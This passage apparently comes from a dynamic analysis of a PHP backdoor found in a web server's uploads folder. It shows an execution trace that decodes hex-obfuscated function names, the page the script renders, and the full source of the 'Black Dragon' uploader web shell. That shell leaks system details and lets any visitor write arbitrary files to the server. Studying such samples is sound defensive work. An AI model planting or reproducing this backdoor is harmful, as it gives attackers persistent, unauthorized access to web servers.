2 A /var/www/html/uploads/up.php.txt 20 $i += 2
3 32 0 0.001306 404424 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '20'
3 32 1 0.001317 404472
3 32 R 32
3 33 0 0.001329 404392 chr 0 /var/www/html/uploads/up.php.txt 21 1 32
3 33 1 0.001340 404432
3 33 R ' '
2 A /var/www/html/uploads/up.php.txt 21 $string .= ' '
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
3 34 0 0.001369 404424 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '44'
3 34 1 0.001381 404472
3 34 R 68
3 35 0 0.001393 404392 chr 0 /var/www/html/uploads/up.php.txt 21 1 68
3 35 1 0.001404 404432
3 35 R 'D'
2 A /var/www/html/uploads/up.php.txt 21 $string .= 'D'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
3 36 0 0.001434 404424 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '72'
3 36 1 0.001445 404472
3 36 R 114
3 37 0 0.001457 404392 chr 0 /var/www/html/uploads/up.php.txt 21 1 114
3 37 1 0.001468 404432
3 37 R 'r'
2 A /var/www/html/uploads/up.php.txt 21 $string .= 'r'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
3 38 0 0.001498 404432 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '61'
3 38 1 0.001509 404480
3 38 R 97
3 39 0 0.001521 404400 chr 0 /var/www/html/uploads/up.php.txt 21 1 97
3 39 1 0.001532 404440
3 39 R 'a'
2 A /var/www/html/uploads/up.php.txt 21 $string .= 'a'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
3 40 0 0.001561 404432 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '67'
3 40 1 0.001572 404480
3 40 R 103
3 41 0 0.001585 404400 chr 0 /var/www/html/uploads/up.php.txt 21 1 103
3 41 1 0.001596 404440
3 41 R 'g'
2 A /var/www/html/uploads/up.php.txt 21 $string .= 'g'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
3 42 0 0.001626 404432 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '6F'
3 42 1 0.001637 404480
3 42 R 111
3 43 0 0.001649 404400 chr 0 /var/www/html/uploads/up.php.txt 21 1 111
3 43 1 0.001660 404440
3 43 R 'o'
2 A /var/www/html/uploads/up.php.txt 21 $string .= 'o'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
3 44 0 0.001690 404432 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '6E'
3 44 1 0.001700 404480
3 44 R 110
3 45 0 0.001713 404400 chr 0 /var/www/html/uploads/up.php.txt 21 1 110
3 45 1 0.001724 404440
3 45 R 'n'
2 A /var/www/html/uploads/up.php.txt 21 $string .= 'n'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
2 21 1 0.001757 404400
2 21 R 'Black Dragon'
1 A /var/www/html/uploads/up.php.txt 15 $bd[1] = 'Black Dragon'
1 A /var/www/html/uploads/up.php.txt 14 $i++
2 46 0 0.001792 404400 uh 1 /var/www/html/uploads/up.php.txt 15 1 '7068705F756E616D65'
2 A /var/www/html/uploads/up.php.txt 19 $string = ''
2 A /var/www/html/uploads/up.php.txt 20 $i = 0
3 47 0 0.001824 404432 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '70'
3 47 1 0.001835 404480
3 47 R 112
3 48 0 0.001848 404400 chr 0 /var/www/html/uploads/up.php.txt 21 1 112
3 48 1 0.001859 404440
3 48 R 'p'
2 A /var/www/html/uploads/up.php.txt 21 $string .= 'p'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
3 49 0 0.001889 404464 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '68'
3 49 1 0.001901 404512
3 49 R 104
3 50 0 0.001913 404432 chr 0 /var/www/html/uploads/up.php.txt 21 1 104
3 50 1 0.001924 404472
3 50 R 'h'
2 A /var/www/html/uploads/up.php.txt 21 $string .= 'h'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
3 51 0 0.001954 404464 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '70'
3 51 1 0.001965 404512
3 51 R 112
3 52 0 0.001977 404432 chr 0 /var/www/html/uploads/up.php.txt 21 1 112
3 52 1 0.001988 404472
3 52 R 'p'
2 A /var/www/html/uploads/up.php.txt 21 $string .= 'p'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
3 53 0 0.002018 404464 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '5F'
3 53 1 0.002029 404512
3 53 R 95
3 54 0 0.002041 404432 chr 0 /var/www/html/uploads/up.php.txt 21 1 95
3 54 1 0.002052 404472
3 54 R '_'
2 A /var/www/html/uploads/up.php.txt 21 $string .= '_'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
3 55 0 0.002082 404464 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '75'
3 55 1 0.002093 404512
3 55 R 117
3 56 0 0.002106 404432 chr 0 /var/www/html/uploads/up.php.txt 21 1 117
3 56 1 0.002117 404472
3 56 R 'u'
2 A /var/www/html/uploads/up.php.txt 21 $string .= 'u'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
3 57 0 0.002147 404464 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '6E'
3 57 1 0.002158 404512
3 57 R 110
3 58 0 0.002171 404432 chr 0 /var/www/html/uploads/up.php.txt 21 1 110
3 58 1 0.002182 404472
3 58 R 'n'
2 A /var/www/html/uploads/up.php.txt 21 $string .= 'n'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
3 59 0 0.002212 404464 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '61'
3 59 1 0.002223 404512
3 59 R 97
3 60 0 0.002235 404432 chr 0 /var/www/html/uploads/up.php.txt 21 1 97
3 60 1 0.002246 404472
3 60 R 'a'
2 A /var/www/html/uploads/up.php.txt 21 $string .= 'a'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
3 61 0 0.002278 404464 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '6D'
3 61 1 0.002307 404512
3 61 R 109
3 62 0 0.002328 404432 chr 0 /var/www/html/uploads/up.php.txt 21 1 109
3 62 1 0.002343 404472
3 62 R 'm'
2 A /var/www/html/uploads/up.php.txt 21 $string .= 'm'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
3 63 0 0.002383 404472 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '65'
3 63 1 0.002399 404520
3 63 R 101
3 64 0 0.002415 404440 chr 0 /var/www/html/uploads/up.php.txt 21 1 101
3 64 1 0.002431 404480
3 64 R 'e'
2 A /var/www/html/uploads/up.php.txt 21 $string .= 'e'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
2 46 1 0.002487 404440
2 46 R 'php_uname'
1 A /var/www/html/uploads/up.php.txt 15 $bd[2] = 'php_uname'
1 A /var/www/html/uploads/up.php.txt 14 $i++
2 65 0 0.002545 404440 uh 1 /var/www/html/uploads/up.php.txt 15 1 '6D6F76655F75706C6F616465645F66696C65'
2 A /var/www/html/uploads/up.php.txt 19 $string = ''
2 A /var/www/html/uploads/up.php.txt 20 $i = 0
3 66 0 0.002599 404472 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '6D'
3 66 1 0.002626 404520
3 66 R 109
3 67 0 0.002648 404440 chr 0 /var/www/html/uploads/up.php.txt 21 1 109
3 67 1 0.002666 404480
3 67 R 'm'
2 A /var/www/html/uploads/up.php.txt 21 $string .= 'm'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
3 68 0 0.002718 404504 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '6F'
3 68 1 0.002736 404552
3 68 R 111
3 69 0 0.002758 404472 chr 0 /var/www/html/uploads/up.php.txt 21 1 111
3 69 1 0.002776 404512
3 69 R 'o'
2 A /var/www/html/uploads/up.php.txt 21 $string .= 'o'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
3 70 0 0.002829 404504 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '76'
3 70 1 0.002847 404552
3 70 R 118
3 71 0 0.002870 404472 chr 0 /var/www/html/uploads/up.php.txt 21 1 118
3 71 1 0.002888 404512
3 71 R 'v'
2 A /var/www/html/uploads/up.php.txt 21 $string .= 'v'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
3 72 0 0.002942 404504 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '65'
3 72 1 0.002960 404552
3 72 R 101
3 73 0 0.002980 404472 chr 0 /var/www/html/uploads/up.php.txt 21 1 101
3 73 1 0.002994 404512
3 73 R 'e'
2 A /var/www/html/uploads/up.php.txt 21 $string .= 'e'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
3 74 0 0.003034 404504 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '5F'
3 74 1 0.003050 404552
3 74 R 95
3 75 0 0.003066 404472 chr 0 /var/www/html/uploads/up.php.txt 21 1 95
3 75 1 0.003082 404512
3 75 R '_'
2 A /var/www/html/uploads/up.php.txt 21 $string .= '_'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
3 76 0 0.003123 404504 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '75'
3 76 1 0.003138 404552
3 76 R 117
3 77 0 0.003154 404472 chr 0 /var/www/html/uploads/up.php.txt 21 1 117
3 77 1 0.003170 404512
3 77 R 'u'
2 A /var/www/html/uploads/up.php.txt 21 $string .= 'u'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
3 78 0 0.003210 404504 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '70'
3 78 1 0.003225 404552
3 78 R 112
3 79 0 0.003241 404472 chr 0 /var/www/html/uploads/up.php.txt 21 1 112
3 79 1 0.003256 404512
3 79 R 'p'
2 A /var/www/html/uploads/up.php.txt 21 $string .= 'p'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
3 80 0 0.003298 404504 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '6C'
3 80 1 0.003314 404552
3 80 R 108
3 81 0 0.003331 404472 chr 0 /var/www/html/uploads/up.php.txt 21 1 108
3 81 1 0.003346 404512
3 81 R 'l'
2 A /var/www/html/uploads/up.php.txt 21 $string .= 'l'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
3 82 0 0.003388 404512 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '6F'
3 82 1 0.003403 404560
3 82 R 111
3 83 0 0.003419 404480 chr 0 /var/www/html/uploads/up.php.txt 21 1 111
3 83 1 0.003433 404520
3 83 R 'o'
2 A /var/www/html/uploads/up.php.txt 21 $string .= 'o'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
3 84 0 0.003475 404512 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '61'
3 84 1 0.003491 404560
3 84 R 97
3 85 0 0.003508 404480 chr 0 /var/www/html/uploads/up.php.txt 21 1 97
3 85 1 0.003535 404520
3 85 R 'a'
2 A /var/www/html/uploads/up.php.txt 21 $string .= 'a'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
3 86 0 0.003577 404512 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '64'
3 86 1 0.003594 404560
3 86 R 100
3 87 0 0.003612 404480 chr 0 /var/www/html/uploads/up.php.txt 21 1 100
3 87 1 0.003627 404520
3 87 R 'd'
2 A /var/www/html/uploads/up.php.txt 21 $string .= 'd'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
3 88 0 0.003669 404512 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '65'
3 88 1 0.003684 404560
3 88 R 101
3 89 0 0.003701 404480 chr 0 /var/www/html/uploads/up.php.txt 21 1 101
3 89 1 0.003723 404520
3 89 R 'e'
2 A /var/www/html/uploads/up.php.txt 21 $string .= 'e'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
3 90 0 0.003764 404512 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '64'
3 90 1 0.003779 404560
3 90 R 100
3 91 0 0.003795 404480 chr 0 /var/www/html/uploads/up.php.txt 21 1 100
3 91 1 0.003810 404520
3 91 R 'd'
2 A /var/www/html/uploads/up.php.txt 21 $string .= 'd'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
3 92 0 0.003850 404512 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '5F'
3 92 1 0.003864 404560
3 92 R 95
3 93 0 0.003881 404480 chr 0 /var/www/html/uploads/up.php.txt 21 1 95
3 93 1 0.003896 404520
3 93 R '_'
2 A /var/www/html/uploads/up.php.txt 21 $string .= '_'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
3 94 0 0.003936 404512 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '66'
3 94 1 0.003952 404560
3 94 R 102
3 95 0 0.003969 404480 chr 0 /var/www/html/uploads/up.php.txt 21 1 102
3 95 1 0.003984 404520
3 95 R 'f'
2 A /var/www/html/uploads/up.php.txt 21 $string .= 'f'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
3 96 0 0.004024 404512 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '69'
3 96 1 0.004039 404560
3 96 R 105
3 97 0 0.004056 404480 chr 0 /var/www/html/uploads/up.php.txt 21 1 105
3 97 1 0.004070 404520
3 97 R 'i'
2 A /var/www/html/uploads/up.php.txt 21 $string .= 'i'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
3 98 0 0.004110 404520 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '6C'
3 98 1 0.004126 404568
3 98 R 108
3 99 0 0.004142 404488 chr 0 /var/www/html/uploads/up.php.txt 21 1 108
3 99 1 0.004157 404528
3 99 R 'l'
2 A /var/www/html/uploads/up.php.txt 21 $string .= 'l'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
3 100 0 0.004197 404520 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '65'
3 100 1 0.004213 404568
3 100 R 101
3 101 0 0.004230 404488 chr 0 /var/www/html/uploads/up.php.txt 21 1 101
3 101 1 0.004244 404528
3 101 R 'e'
2 A /var/www/html/uploads/up.php.txt 21 $string .= 'e'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
2 65 1 0.004285 404488
2 65 R 'move_uploaded_file'
1 A /var/www/html/uploads/up.php.txt 15 $bd[3] = 'move_uploaded_file'
1 A /var/www/html/uploads/up.php.txt 14 $i++
2 102 0 0.004335 404488 php_uname 0 /var/www/html/uploads/up.php.txt 46 0
2 102 1 0.004353 404600
2 102 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1 3 1 0.004379 404488
0.004413 317176
TRACE END [2023-02-12 20:22:44.141876]
Generated HTML code
<html><head>
<meta charset="utf-8">
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous">
<link rel="stylesheet" href="https://pro.fontawesome.com/releases/v5.10.0/css/all.css" integrity="sha384-AYmEC3Yw5cVb3ZcuHtOA93w35dYTsvhLPVnYs9eStHfGJvOvKxVfELGroGkvsg+p" crossorigin="anonymous">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Lobster">
<title>Uploader</title>
<style>
h1{
font-family: Lobster;
}
</style>
</head>
<body>
<div class="container">
<br><br><br><br><br>
<table width="100%">
<tbody><tr><td>
<center>
<h1>Black Dragon</h1>
Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 </center>
<br>
<div class="d-flex justify-content-center align-items-center">
<form method="post" enctype="multipart/form-data">
<div class="row">
<div class="col-md-9 mb-3">
<input type="file" class="form-control form-control-sm" name="uploadfile[]" multiple="" aria-label="Upload">
</div>
<div class="col-md-3">
<button type="submit" class="btn btn-primary btn-sm">Submit</button>
</div>
</div>
</form>
</div>
</td>
</tr></tbody></table>
</div>
</body></html>Original PHP code
<?php
/**
* Uploader Bypass
**/
$main = [
"55706C6F61646572",
"426C61636B20447261676F6E",
"7068705F756E616D65",
"6D6F76655F75706C6F616465645F66696C65"
];
for ($i = 0; $i < count($main); $i++) {
$bd[$i] = uh($main[$i]);
}
function uh($hex){
$string='';
for ($i=0; $i < strlen($hex)-1; $i+=2){
$string .= chr(hexdec($hex[$i].$hex[$i+1]));
}
return $string;
}
?>
<html>
<head>
<meta charset="utf-8">
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous">
<link rel="stylesheet" href="https://pro.fontawesome.com/releases/v5.10.0/css/all.css" integrity="sha384-AYmEC3Yw5cVb3ZcuHtOA93w35dYTsvhLPVnYs9eStHfGJvOvKxVfELGroGkvsg+p" crossorigin="anonymous"/>
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Lobster">
<title><?= $bd[0] ?></title>
<style>
h1{
font-family: Lobster;
}
</style>
</head>
<body>
<div class="container">
<br><br><br><br><br>
<table width="100%">
<td>
<center>
<h1><?= $bd[1] ?></h1>
<?= $bd[2]() ?>
</center>
<br>
<div class="d-flex justify-content-center align-items-center">
<form method="post" enctype="multipart/form-data">
<div class="row">
<div class="col-md-9 mb-3">
<input type="file" class="form-control form-control-sm" name="uploadfile[]" multiple aria-label="Upload">
</div>
<div class="col-md-3">
<button type="submit" class="btn btn-primary btn-sm">Submit</button>
</div>
</div>
</form>
</div>
<?php
if (isset($_FILES['uploadfile'])) {
$total = count($_FILES['uploadfile']['name']);
for ($i = 0; $i < $total; $i++) {
$mainupload = $bd[3]($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]);
}
if ($total < 2) {
if ($mainupload) {
echo("<center><div class='col-md-3'><div class='alert alert-success' role='alert'>Upload File Successfully!</div></div></center>");
} else {
echo("<center><div class='col-md-3'><div class='alert alert-danger' role='alert'>Upload File Failed</div></div></center>");
}
}
else{
if ($mainupload) {
echo("<center><div class='col-md-3'><div class='alert alert-success' role='alert'>Upload $i Files Successfully!</div></div></center>");
} else {
echo("<center><div class='col-md-3'><div class='alert alert-danger' role='alert'>Upload File Failed</div></div></center>");
}
}
}
?>
</td>
</table>
</div>
</body>
<html>